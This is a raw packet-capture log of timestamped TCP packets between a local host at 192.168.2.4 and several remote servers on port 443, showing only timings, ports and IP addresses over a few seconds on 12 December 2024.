                                                                                                                                                                                                          Dec 12, 2024 00:28:52.613591909 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.613646984 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.613662004 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.618617058 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.618681908 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.618688107 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.629550934 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.629789114 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.629796028 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.629822016 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.629878998 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.634430885 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.634497881 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.634519100 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.637617111 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.640527964 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.640597105 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.640604019 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.645730019 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.645832062 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.645872116 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.645911932 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.645963907 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.646783113 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.646836996 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.646842957 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.652301073 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.652738094 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.652813911 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.652818918 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.658735991 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.658801079 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.658818007 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.659024000 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.659079075 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.659085035 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.665067911 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.665169001 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.665183067 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671145916 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671237946 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671240091 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671291113 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671497107 CET49751443192.168.2.4104.17.24.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.671530008 CET44349751104.17.24.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.675059080 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.675112963 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.675204039 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.675370932 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.675405025 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.710737944 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.710758924 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.759759903 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.759864092 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.759871960 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.762778997 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.762928009 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.762933016 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.772238016 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.772310972 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.772315979 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.777182102 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.777262926 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.777345896 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.777353048 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.777393103 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.781728029 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.813894033 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.813918114 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.813939095 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.813981056 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.813999891 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814181089 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814181089 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814181089 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814181089 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814208984 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814227104 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.814273119 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.827775002 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.827802896 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.827975035 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.828063965 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.828063965 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.828063965 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.828424931 CET49749443192.168.2.4151.101.66.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.828442097 CET44349749151.101.66.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.972472906 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.972527027 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.972601891 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.972796917 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.972810984 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.610199928 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.610713959 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.610779047 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.611282110 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.611557007 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.611660004 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.611671925 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.659349918 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.664401054 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.898058891 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.898508072 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.898529053 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.898946047 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.899415016 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.899472952 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.899601936 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.943346977 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070261955 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070311069 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070342064 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070370913 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070404053 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070435047 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070504904 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070506096 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070555925 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.070687056 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.078558922 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.078768015 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.078799009 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.095365047 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.095479012 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.095495939 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.150010109 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.189486027 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.193651915 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.194195986 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.194261074 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.197798967 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.197921038 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.198457003 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.198630095 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.198640108 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.239373922 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.244092941 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.244093895 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.244142056 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.244174957 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.265445948 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.265536070 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.265562057 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.274800062 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.275070906 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.275142908 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.275209904 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.275285006 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.282604933 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290330887 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290397882 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290482998 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290484905 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290502071 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.290556908 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.298260927 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.306030989 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.306210041 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.306272030 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.314006090 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.314095974 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.314114094 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.321772099 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.321866989 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.321881056 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.329497099 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.329575062 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.329588890 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.345134020 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.345212936 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.345328093 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.345396042 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.345474958 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.352920055 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353034019 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353104115 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353120089 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353142023 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353212118 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353599072 CET49752443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.353626966 CET44349752104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.360791922 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361219883 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361258030 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361296892 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361361980 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361424923 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361468077 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361500978 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361552954 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.361568928 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.369740963 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.369821072 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.369836092 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.386502981 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.386670113 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.386702061 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.429723024 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.480185986 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.498889923 CET49756443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.498931885 CET44349756104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.499051094 CET49756443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.499275923 CET49756443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.499294996 CET44349756104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.528858900 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.528918982 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.564990997 CET49757443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.565041065 CET44349757104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.565140963 CET49757443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.565371037 CET49757443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.565387964 CET44349757104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.575114012 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.575172901 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.579647064 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.579744101 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.579766035 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.592439890 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.592551947 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.592641115 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.592657089 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.592721939 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.600439072 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.608455896 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.608540058 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.608546972 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.616450071 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.616554022 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.616648912 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.616714954 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.616796017 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.622833967 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.629440069 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.629511118 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.629528046 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630508900 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630692959 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630786896 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630876064 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630974054 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.630975008 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.631041050 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.635880947 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.635972977 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.635987997 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.638674021 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.638761997 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.638781071 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.642232895 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.642307043 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.642321110 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.647293091 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.647365093 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.647380114 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655000925 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655071974 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655085087 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655771017 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655842066 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.655857086 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.710935116 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.710942030 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.711049080 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.711110115 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.750201941 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.756881952 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.756943941 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.766252995 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.768627882 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.768699884 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.768718958 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.768738985 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.768811941 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.770149946 CET49753443192.168.2.4104.17.25.14
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.770176888 CET44349753104.17.25.14192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.806473970 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863498926 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863534927 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863617897 CET49754443192.168.2.4151.101.194.137
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863667965 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863688946 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863739967 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863779068 CET44349754151.101.194.137192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.863784075 CET49754443192.168.2.4151.101.194.137
